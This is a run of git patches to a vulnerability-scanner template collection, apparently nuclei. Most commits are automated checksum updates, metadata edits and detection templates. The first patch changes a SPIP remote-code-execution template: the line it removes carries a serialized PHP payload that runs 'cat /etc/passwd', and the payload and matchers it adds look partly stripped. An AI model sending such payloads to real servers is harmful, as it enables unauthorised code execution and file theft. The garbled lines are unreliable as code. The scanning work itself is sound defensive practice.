Date: Thu, 22 Jun 2023 12:32:57 +0530
Subject: [PATCH 481/670] payload updation to detect both windows and linux
---
http/cves/2023/CVE-2023-27372.yaml | 26 +++++++++++++++++---------
1 file changed, 17 insertions(+), 9 deletions(-)
diff --git a/http/cves/2023/CVE-2023-27372.yaml b/http/cves/2023/CVE-2023-27372.yaml
index 896c3e8e1d..455536fe13 100644
--- a/http/cves/2023/CVE-2023-27372.yaml
+++ b/http/cves/2023/CVE-2023-27372.yaml
@@ -2,7 +2,7 @@ id: CVE-2023-27372
info:
name: SPIP - Remote Command Execution
- author: DhiyaneshDK
+ author: DhiyaneshDK,nuts7
severity: critical
description: |
SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1.
@@ -31,19 +31,21 @@ http:
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
- page=spip_pass&formulaire_action=oubli&formulaire_action_args={{csrf}}&oubli=s%3A35%3A%22%3C%3Fphp+system%28%27cat+%2Fetc%2Fpasswd%27%29%3B+%3F%3E%22%3B
+ page=spip_pass&formulaire_action=oubli&formulaire_action_args={{csrf}}&oubli=s:19:"";
matchers-condition: and
matchers:
- - type: regex
- part: body_2
- regex:
- - "root:.*:0:0:"
-
- type: word
- part: header_2
+ part: body_2
words:
- - text/html
+ - "PHP Extension"
+ - "PHP Version"
+ - "]*value='([^']*)'"
+
+ - type: regex
+ part: body_2
+ group: 1
+ regex:
+ - '>PHP Version <\/td>([0-9.]+)'
From 72ab5780d7820797f2ab25a1270bede0f8b7c17d Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Thu, 22 Jun 2023 12:36:37 +0530
Subject: [PATCH 482/670] Update CVE-2023-1454.yaml
---
http/cves/2023/CVE-2023-1454.yaml | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/http/cves/2023/CVE-2023-1454.yaml b/http/cves/2023/CVE-2023-1454.yaml
index 0ca0661d87..3ef91e6605 100644
--- a/http/cves/2023/CVE-2023-1454.yaml
+++ b/http/cves/2023/CVE-2023-1454.yaml
@@ -16,8 +16,9 @@ info:
cwe-id: CWE-89
metadata:
max-request: 1
- shodan-query: http.favicon.hash:1380908726
verified: "true"
+ shodan-query: http.favicon.hash:1380908726
+
tags: cve,cve2023,jeecg,sqli
From a1840d640b25a724d5f04f53483e3aaa0c9d50cb Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Thu, 22 Jun 2023 12:40:18 +0530
Subject: [PATCH 483/670] Update CVE-2023-1454.yaml
---
http/cves/2023/CVE-2023-1454.yaml | 2 --
1 file changed, 2 deletions(-)
diff --git a/http/cves/2023/CVE-2023-1454.yaml b/http/cves/2023/CVE-2023-1454.yaml
index 3ef91e6605..f175f4edb3 100644
--- a/http/cves/2023/CVE-2023-1454.yaml
+++ b/http/cves/2023/CVE-2023-1454.yaml
@@ -18,10 +18,8 @@ info:
max-request: 1
verified: "true"
shodan-query: http.favicon.hash:1380908726
-
tags: cve,cve2023,jeecg,sqli
-
http:
- raw:
- |
From 73fbf26600114b1ea95237fc80b3dfcbd63841d7 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Thu, 22 Jun 2023 07:15:15 +0000
Subject: [PATCH 484/670] Auto Generated New Template Addition List [Thu Jun 22
07:15:15 UTC 2023] :robot:
---
.new-additions | 1 +
1 file changed, 1 insertion(+)
diff --git a/.new-additions b/.new-additions
index 42c50d27c2..cdbb4c1277 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,3 +1,4 @@
+http/cves/2023/CVE-2023-1454.yaml
http/cves/2023/CVE-2023-33510.yaml
http/cves/2023/CVE-2023-35843.yaml
http/cves/2023/CVE-2023-35844.yaml
From 882a315113014c75611d4732478ecb089103e510 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Thu, 22 Jun 2023 07:15:26 +0000
Subject: [PATCH 485/670] Auto Generated Templates Checksum [Thu Jun 22
07:15:26 UTC 2023] :robot:
---
templates-checksum.txt | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/templates-checksum.txt b/templates-checksum.txt
index 36514a00ca..1d9a925ed4 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -2214,6 +2214,7 @@ http/cves/2023/CVE-2023-1080.yaml:d156e6f61bfb3182f69a7a3997044b837f174a68
http/cves/2023/CVE-2023-1177.yaml:db3b9a8ffe51ae45f082e3e39639a9910d1fe95e
http/cves/2023/CVE-2023-1362.yaml:fc0a08215591665226c1a118990609422e8a8a0f
http/cves/2023/CVE-2023-1434.yaml:a68d4a8bb2e0e74d8593a52664402abea29b7e68
+http/cves/2023/CVE-2023-1454.yaml:a882db102c7370e2a8358c3b9f37ef4f25311c68
http/cves/2023/CVE-2023-1671.yaml:5cd17b9a51849bff7772e8791691be9008a559cc
http/cves/2023/CVE-2023-20864.yaml:a942bfcf278ae2437eea0c21b1b7012f253528dd
http/cves/2023/CVE-2023-20887.yaml:1f936b73c167d4086d2844cd9b2a3699d448c90d
@@ -6437,7 +6438,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e
ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
ssl/weak-cipher-suites.yaml:f79774dc9a0d4b55226a5da0c93a6d583d55a3df
-templates-checksum.txt:9ea8254e66fece77412edfd1ae9013e1539994fd
+templates-checksum.txt:16f55bc90f5f755274dad0cf916415b3ccd18537
wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f
From 565e5d32de31bd1f773a6b1d59dfb00cadbe7604 Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Thu, 22 Jun 2023 12:48:18 +0530
Subject: [PATCH 486/670] minor -update
---
http/cves/2021/CVE-2021-46704.yaml | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/http/cves/2021/CVE-2021-46704.yaml b/http/cves/2021/CVE-2021-46704.yaml
index 35e2266e2d..bdc1db3283 100644
--- a/http/cves/2021/CVE-2021-46704.yaml
+++ b/http/cves/2021/CVE-2021-46704.yaml
@@ -1,7 +1,7 @@
id: CVE-2021-46704
info:
- name: GenieACS - OS Command Injection
+ name: GenieACS => 1.2.8 - OS Command Injection
author: DhiyaneshDK
severity: critical
description: |
@@ -19,7 +19,7 @@ info:
max-request: 1
verified: "true"
shodan-query: http.favicon.hash:-2098066288
- tags: cve,cve2021,genieacs
+ tags: cve,cve2021,genieacs,rce
http:
- method: GET
From 6e6f1e80ada783fd3488e6209b78dda1519caf60 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Thu, 22 Jun 2023 07:21:53 +0000
Subject: [PATCH 487/670] Auto Generated New Template Addition List [Thu Jun 22
07:21:53 UTC 2023] :robot:
---
.new-additions | 1 +
1 file changed, 1 insertion(+)
diff --git a/.new-additions b/.new-additions
index cdbb4c1277..d9a6a32b70 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,3 +1,4 @@
+http/cves/2021/CVE-2021-46704.yaml
http/cves/2023/CVE-2023-1454.yaml
http/cves/2023/CVE-2023-33510.yaml
http/cves/2023/CVE-2023-35843.yaml
From 1fc29162e0e71b080af7d3ebd0ac24525cab4948 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Thu, 22 Jun 2023 07:22:02 +0000
Subject: [PATCH 488/670] Auto Generated Templates Checksum [Thu Jun 22
07:22:02 UTC 2023] :robot:
---
templates-checksum.txt | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/templates-checksum.txt b/templates-checksum.txt
index 1d9a925ed4..b2b2a3f9e9 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -1804,6 +1804,7 @@ http/cves/2021/CVE-2021-46387.yaml:4c99fe80f15d731b588cff0b641d22adb6e234db
http/cves/2021/CVE-2021-46417.yaml:ef1332077aba5456d7face1e549877f5a84567f8
http/cves/2021/CVE-2021-46422.yaml:7408d34e8fcb49f71420a3dad7e8d86f2bcedd65
http/cves/2021/CVE-2021-46424.yaml:3d8384c0bafc54b6c72409092a1eb23f5d17d5a5
+http/cves/2021/CVE-2021-46704.yaml:56cf6a73dfa930e2f0198be4b73ab5faa8022e6a
http/cves/2022/CVE-2022-0140.yaml:e35651cc2f2691a33c578eb28ae40e49f4f66d96
http/cves/2022/CVE-2022-0147.yaml:f69bf0598fa81721db47ef4dde1daea2e003c887
http/cves/2022/CVE-2022-0148.yaml:6cf0fefded7a6d5ef15848958cd831176f38d621
@@ -6438,7 +6439,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e
ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
ssl/weak-cipher-suites.yaml:f79774dc9a0d4b55226a5da0c93a6d583d55a3df
-templates-checksum.txt:16f55bc90f5f755274dad0cf916415b3ccd18537
+templates-checksum.txt:5260b8ed534284d5d1d0e2d9da916b5e5509a5a0
wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f
From 4fdc5049e6671bdaeb36a9471aa9e7a5955b6389 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Thu, 22 Jun 2023 07:26:42 +0000
Subject: [PATCH 490/670] Auto Generated New Template Addition List [Thu Jun 22
07:26:42 UTC 2023] :robot:
---
.new-additions | 1 +
1 file changed, 1 insertion(+)
diff --git a/.new-additions b/.new-additions
index d9a6a32b70..fba9afe66d 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,4 +1,5 @@
http/cves/2021/CVE-2021-46704.yaml
+http/cves/2022/CVE-2022-40022.yaml
http/cves/2023/CVE-2023-1454.yaml
http/cves/2023/CVE-2023-33510.yaml
http/cves/2023/CVE-2023-35843.yaml
From cb704aca0ce669969e072f3ae6db6c98b1c5b576 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Thu, 22 Jun 2023 07:26:58 +0000
Subject: [PATCH 491/670] Auto Generated Templates Checksum [Thu Jun 22
07:26:58 UTC 2023] :robot:
---
templates-checksum.txt | 5 +++--
1 file changed, 3 insertions(+), 2 deletions(-)
diff --git a/templates-checksum.txt b/templates-checksum.txt
index b2b2a3f9e9..6a46383f14 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -2143,6 +2143,7 @@ http/cves/2022/CVE-2022-3980.yaml:46865753312025256c7d9994bf535bec98f1d63f
http/cves/2022/CVE-2022-3982.yaml:995b0a9d052bec87678838c1acb3f0e2f4454e41
http/cves/2022/CVE-2022-39952.yaml:a72f183386bfaf28386edfc1bf8fc942fdc1ca23
http/cves/2022/CVE-2022-39960.yaml:4056835c7dcb8d36981308a2473aa7e5a56564a1
+http/cves/2022/CVE-2022-40022.yaml:968f886d14011acefd840d1750585b527ad00333
http/cves/2022/CVE-2022-40083.yaml:9ba7fc77af19ea9fd4c26fdba205dfe35dff0010
http/cves/2022/CVE-2022-40359.yaml:585ea7fc6f6e4c36cd21cbd769bc5baf762b57fb
http/cves/2022/CVE-2022-4050.yaml:473f4be072cbe3ee2cabe9f429220c526f681bf1
@@ -2458,7 +2459,7 @@ http/exposed-panels/appwrite-panel.yaml:40dae5138e0278eb81207a973e23cac840698246
http/exposed-panels/aptus-panel.yaml:29b3f8d2e0b74c8e8b9f8d56fb423a1fc967352c
http/exposed-panels/aqua-enterprise-panel.yaml:3cc8efaa89d82293c1f36c6c270953884f7fc8ff
http/exposed-panels/arcgis/arcgis-panel.yaml:d3868325015954e4185168103932f7bf4351aa80
-http/exposed-panels/arcgis/arcgis-rest-api.yaml:f6d3d91c266e525e2d665211fdd44fc645a881eb
+http/exposed-panels/arcgis/arcgis-rest-api.yaml:4d9a0f2ecb296da8faf516ddd36821beb0367e38
http/exposed-panels/arcgis/arcgis-services.yaml:82ce551d279a9d6c531a18f099e2046f9e3594ea
http/exposed-panels/arcgis/arcgis-tokens.yaml:45cf23e074e3f7228b94416a19f8d1551fd4c664
http/exposed-panels/archibus-webcentral-panel.yaml:1387b64acd9b5192e4525d83db62f7ff4320852b
@@ -6439,7 +6440,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e
ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
ssl/weak-cipher-suites.yaml:f79774dc9a0d4b55226a5da0c93a6d583d55a3df
-templates-checksum.txt:5260b8ed534284d5d1d0e2d9da916b5e5509a5a0
+templates-checksum.txt:1269381d7790dbaa128ee63299a9aa9c06d3712c
wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f
From b467cac3e572cee8da7f7e055841fcaa59bcd55e Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Thu, 22 Jun 2023 07:30:44 +0000
Subject: [PATCH 492/670] Auto Generated New Template Addition List [Thu Jun 22
07:30:44 UTC 2023] :robot:
---
.new-additions | 1 +
1 file changed, 1 insertion(+)
diff --git a/.new-additions b/.new-additions
index fba9afe66d..a908d763e6 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,6 +1,7 @@
http/cves/2021/CVE-2021-46704.yaml
http/cves/2022/CVE-2022-40022.yaml
http/cves/2023/CVE-2023-1454.yaml
+http/cves/2023/CVE-2023-27372.yaml
http/cves/2023/CVE-2023-33510.yaml
http/cves/2023/CVE-2023-35843.yaml
http/cves/2023/CVE-2023-35844.yaml
From cd3b14d11f5555397ae46545e32e4b6e66d30e3d Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Thu, 22 Jun 2023 07:30:49 +0000
Subject: [PATCH 493/670] Auto Generated Templates Checksum [Thu Jun 22
07:30:49 UTC 2023] :robot:
---
templates-checksum.txt | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/templates-checksum.txt b/templates-checksum.txt
index 6a46383f14..51e52149da 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -2251,6 +2251,7 @@ http/cves/2023/CVE-2023-27179.yaml:e75be23d27b88aa95e07d67a32194c712f9e3165
http/cves/2023/CVE-2023-27292.yaml:0ebef1533552ad048000fdb81c42c5951451fedb
http/cves/2023/CVE-2023-2732.yaml:4c7a4fabba09d411063a937691a2d3d4ca003f9f
http/cves/2023/CVE-2023-27350.yaml:ce436afebac78275c225ccd587cd005bf3876503
+http/cves/2023/CVE-2023-27372.yaml:6f77f80914859c100849a02df0dcccd9780041a0
http/cves/2023/CVE-2023-27482.yaml:7c0352493005b43c7b29dc166a05febe2afb486f
http/cves/2023/CVE-2023-27524.yaml:5d9d1c2f754a3827697cb0bf2ef692674d04ca12
http/cves/2023/CVE-2023-27587.yaml:a0b97ad8bafd98905e0b0e87847d3403fac759a7
@@ -6440,7 +6441,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e
ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
ssl/weak-cipher-suites.yaml:f79774dc9a0d4b55226a5da0c93a6d583d55a3df
-templates-checksum.txt:1269381d7790dbaa128ee63299a9aa9c06d3712c
+templates-checksum.txt:bb92cbf6b5f6353d866740284fcc7bbb42fa7dc6
wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f
From 4b955483e6c14fe7c33092c3cf58355b2ab55212 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Thu, 22 Jun 2023 07:32:03 +0000
Subject: [PATCH 494/670] TemplateMan Update [Thu Jun 22 07:32:03 UTC 2023]
:robot:
---
http/cves/2023/CVE-2023-27372.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/http/cves/2023/CVE-2023-27372.yaml b/http/cves/2023/CVE-2023-27372.yaml
index 455536fe13..0a5166faf7 100644
--- a/http/cves/2023/CVE-2023-27372.yaml
+++ b/http/cves/2023/CVE-2023-27372.yaml
@@ -15,7 +15,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2023-27372
metadata:
- max-request: 1
+ max-request: 2
shodan-query: html:"spip.php?page=backend"
verified: "true"
tags: cve,cve2023,spip,rce
From 5a8210830850fdc178dfd8332d64563bcadfc1b6 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Thu, 22 Jun 2023 07:33:46 +0000
Subject: [PATCH 495/670] Auto Generated New Template Addition List [Thu Jun 22
07:33:45 UTC 2023] :robot:
---
.new-additions | 1 +
1 file changed, 1 insertion(+)
diff --git a/.new-additions b/.new-additions
index a908d763e6..a715037e6e 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,3 +1,4 @@
+http/cves/2012/CVE-2012-6499.yaml
http/cves/2021/CVE-2021-46704.yaml
http/cves/2022/CVE-2022-40022.yaml
http/cves/2023/CVE-2023-1454.yaml
From 66f20f72bbd923805a05a66982cf261a5d4fd295 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Thu, 22 Jun 2023 07:33:48 +0000
Subject: [PATCH 496/670] Auto Generated Templates Checksum [Thu Jun 22
07:33:48 UTC 2023] :robot:
---
templates-checksum.txt | 5 +++--
1 file changed, 3 insertions(+), 2 deletions(-)
diff --git a/templates-checksum.txt b/templates-checksum.txt
index 51e52149da..786f468cdb 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -619,6 +619,7 @@ http/cves/2012/CVE-2012-4889.yaml:b94729905c1eb7527864aac08d9fe12ec43dac86
http/cves/2012/CVE-2012-4940.yaml:ad96fe92c5108ab23e46211fe893ac7df8baa78e
http/cves/2012/CVE-2012-4982.yaml:edd0146a6beac65161aa4074a99ba6c4e4d325cc
http/cves/2012/CVE-2012-5913.yaml:b0ddd82e2ce5a8628df761041d1b4280aeecd00b
+http/cves/2012/CVE-2012-6499.yaml:626be9c69b817560de289ba1d83d1147bcdce6eb
http/cves/2013/CVE-2013-1965.yaml:babc668e22e6d8704ce7cf798fb454f22d32c604
http/cves/2013/CVE-2013-2248.yaml:7d0503d1be8337527e505bf906f8caec7de56a4e
http/cves/2013/CVE-2013-2251.yaml:27cf22446500d19319624be2af88407bfa933aa6
@@ -2251,7 +2252,7 @@ http/cves/2023/CVE-2023-27179.yaml:e75be23d27b88aa95e07d67a32194c712f9e3165
http/cves/2023/CVE-2023-27292.yaml:0ebef1533552ad048000fdb81c42c5951451fedb
http/cves/2023/CVE-2023-2732.yaml:4c7a4fabba09d411063a937691a2d3d4ca003f9f
http/cves/2023/CVE-2023-27350.yaml:ce436afebac78275c225ccd587cd005bf3876503
-http/cves/2023/CVE-2023-27372.yaml:6f77f80914859c100849a02df0dcccd9780041a0
+http/cves/2023/CVE-2023-27372.yaml:d75a7ba52cfbb03254be5a8ac9e16f05caa45768
http/cves/2023/CVE-2023-27482.yaml:7c0352493005b43c7b29dc166a05febe2afb486f
http/cves/2023/CVE-2023-27524.yaml:5d9d1c2f754a3827697cb0bf2ef692674d04ca12
http/cves/2023/CVE-2023-27587.yaml:a0b97ad8bafd98905e0b0e87847d3403fac759a7
@@ -6441,7 +6442,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e
ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
ssl/weak-cipher-suites.yaml:f79774dc9a0d4b55226a5da0c93a6d583d55a3df
-templates-checksum.txt:bb92cbf6b5f6353d866740284fcc7bbb42fa7dc6
+templates-checksum.txt:fe6a043366d6cadce895351847f8155f76d2111c
wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f
From 98cf25dfed29d08ab073c2d288453c7cbb8b4433 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Thu, 22 Jun 2023 07:35:38 +0000
Subject: [PATCH 497/670] TemplateMan Update [Thu Jun 22 07:35:38 UTC 2023]
:robot:
---
http/cves/2012/CVE-2012-6499.yaml | 2 ++
1 file changed, 2 insertions(+)
diff --git a/http/cves/2012/CVE-2012-6499.yaml b/http/cves/2012/CVE-2012-6499.yaml
index 9b5a7bbf67..1b8e9b0ad9 100644
--- a/http/cves/2012/CVE-2012-6499.yaml
+++ b/http/cves/2012/CVE-2012-6499.yaml
@@ -16,6 +16,8 @@ info:
cve-id: CVE-2012-6499
cwe-id: CWE-20
cpe: cpe:2.3:a:age_verification_project:age_verification:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
tags: cve,cve2012,wordpress,wp,wp-plugin,redirect,age-verification
http:
From f15cfb0b43c89b4cdbdce6e3fd7babfe483b9324 Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Thu, 22 Jun 2023 15:24:21 +0530
Subject: [PATCH 498/670] added matcher name for better visibility in result.
---
ssl/weak-cipher-suites.yaml | 4 ++++
1 file changed, 4 insertions(+)
diff --git a/ssl/weak-cipher-suites.yaml b/ssl/weak-cipher-suites.yaml
index fee702ea14..3f7ceee1c3 100644
--- a/ssl/weak-cipher-suites.yaml
+++ b/ssl/weak-cipher-suites.yaml
@@ -26,6 +26,7 @@ ssl:
matchers:
- type: word
+ name: tls-1.0
part: cipher
words:
- "TLS_DHE_PSK_WITH_CAMELLIA_128_CBC_SHA256"
@@ -237,6 +238,7 @@ ssl:
matchers:
- type: word
+ name: tls-1.1
part: cipher
words:
- "TLS_DHE_PSK_WITH_CAMELLIA_128_CBC_SHA256"
@@ -448,6 +450,7 @@ ssl:
matchers:
- type: word
+ name: tls-1.2
part: cipher
words:
- "TLS_DHE_PSK_WITH_CAMELLIA_128_CBC_SHA256"
@@ -659,6 +662,7 @@ ssl:
matchers:
- type: word
+ name: tls-1.3
part: cipher
words:
- "TLS_DHE_PSK_WITH_CAMELLIA_128_CBC_SHA256"
From 53638faf07e3b85d78ccd6974b2e841724e034aa Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Thu, 22 Jun 2023 09:54:55 +0000
Subject: [PATCH 500/670] Auto Generated Templates Checksum [Thu Jun 22
09:54:55 UTC 2023] :robot:
---
templates-checksum.txt | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/templates-checksum.txt b/templates-checksum.txt
index 786f468cdb..b469efa0ff 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -619,7 +619,7 @@ http/cves/2012/CVE-2012-4889.yaml:b94729905c1eb7527864aac08d9fe12ec43dac86
http/cves/2012/CVE-2012-4940.yaml:ad96fe92c5108ab23e46211fe893ac7df8baa78e
http/cves/2012/CVE-2012-4982.yaml:edd0146a6beac65161aa4074a99ba6c4e4d325cc
http/cves/2012/CVE-2012-5913.yaml:b0ddd82e2ce5a8628df761041d1b4280aeecd00b
-http/cves/2012/CVE-2012-6499.yaml:626be9c69b817560de289ba1d83d1147bcdce6eb
+http/cves/2012/CVE-2012-6499.yaml:522ad7554dd76fbb2e125c7da7aef0e42b6e129d
http/cves/2013/CVE-2013-1965.yaml:babc668e22e6d8704ce7cf798fb454f22d32c604
http/cves/2013/CVE-2013-2248.yaml:7d0503d1be8337527e505bf906f8caec7de56a4e
http/cves/2013/CVE-2013-2251.yaml:27cf22446500d19319624be2af88407bfa933aa6
@@ -6441,8 +6441,8 @@ ssl/self-signed-ssl.yaml:50d5647b781a18060f6a8331c74bc2dec118d33b
ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e
ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
-ssl/weak-cipher-suites.yaml:f79774dc9a0d4b55226a5da0c93a6d583d55a3df
-templates-checksum.txt:fe6a043366d6cadce895351847f8155f76d2111c
+ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec
+templates-checksum.txt:9f6c67a768bcbcca5a2a2ce1a4cd4714e93722e9
wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f
From 81e857d8bf6b037a50f52832e0a9892a9a2d9cfb Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Thu, 22 Jun 2023 18:14:51 +0530
Subject: [PATCH 501/670] Create axxon-client-panel.yaml
---
http/exposed-panels/axxon-client-panel.yaml | 32 +++++++++++++++++++++
1 file changed, 32 insertions(+)
create mode 100644 http/exposed-panels/axxon-client-panel.yaml
diff --git a/http/exposed-panels/axxon-client-panel.yaml b/http/exposed-panels/axxon-client-panel.yaml
new file mode 100644
index 0000000000..a5a9780070
--- /dev/null
+++ b/http/exposed-panels/axxon-client-panel.yaml
@@ -0,0 +1,32 @@
+id: axxon-client-panel
+
+info:
+ name: Axxon Next Client Login - Detect
+ author: irshadahamed
+ severity: low
+ description: Axxon One is a limitlessly scalable video management software
+ reference:
+ - https://www.axxonsoft.com/products/video-management-software
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+ cvss-score: 0.0
+ cwe-id: CWE-200
+ metadata:
+ verified: true
+ shodan-query: title:"Axxon Next client"
+ tags: panel,axxon,vms,login,detect
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Axxon Next client"
+
+ - type: status
+ status:
+ - 200
From 4488620f6b1bb3d8962d8af62bc98da60394486c Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Thu, 22 Jun 2023 18:16:18 +0530
Subject: [PATCH 502/670] updated severity
---
http/exposed-panels/axxon-client-panel.yaml | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/http/exposed-panels/axxon-client-panel.yaml b/http/exposed-panels/axxon-client-panel.yaml
index a5a9780070..78e36e7ee9 100644
--- a/http/exposed-panels/axxon-client-panel.yaml
+++ b/http/exposed-panels/axxon-client-panel.yaml
@@ -3,7 +3,7 @@ id: axxon-client-panel
info:
name: Axxon Next Client Login - Detect
author: irshadahamed
- severity: low
+ severity: info
description: Axxon One is a limitlessly scalable video management software
reference:
- https://www.axxonsoft.com/products/video-management-software
@@ -24,6 +24,7 @@ http:
matchers-condition: and
matchers:
- type: word
+ part: body
words:
- "Axxon Next client"
From aab2042e1ec782730f3046e454b1d98399551830 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Fri, 23 Jun 2023 04:02:13 +0000
Subject: [PATCH 503/670] Auto WordPress Plugins Update [Fri Jun 23 04:02:13
UTC 2023] :robot:
---
helpers/wordpress/plugins/all-in-one-seo-pack.txt | 2 +-
helpers/wordpress/plugins/autoptimize.txt | 2 +-
helpers/wordpress/plugins/coblocks.txt | 2 +-
helpers/wordpress/plugins/duplicator.txt | 2 +-
helpers/wordpress/plugins/fluentform.txt | 2 +-
helpers/wordpress/plugins/meta-box.txt | 2 +-
helpers/wordpress/plugins/newsletter.txt | 2 +-
helpers/wordpress/plugins/optinmonster.txt | 2 +-
helpers/wordpress/plugins/premium-addons-for-elementor.txt | 2 +-
helpers/wordpress/plugins/the-events-calendar.txt | 2 +-
helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt | 2 +-
http/technologies/wordpress/plugins/ad-inserter.yaml | 1 -
http/technologies/wordpress/plugins/add-to-any.yaml | 1 -
http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 -
http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 -
http/technologies/wordpress/plugins/akismet.yaml | 1 -
.../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 -
http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 -
.../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 -
.../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 -
http/technologies/wordpress/plugins/amp.yaml | 1 -
http/technologies/wordpress/plugins/antispam-bee.yaml | 1 -
http/technologies/wordpress/plugins/astra-sites.yaml | 1 -
http/technologies/wordpress/plugins/astra-widgets.yaml | 1 -
http/technologies/wordpress/plugins/autoptimize.yaml | 1 -
http/technologies/wordpress/plugins/backwpup.yaml | 1 -
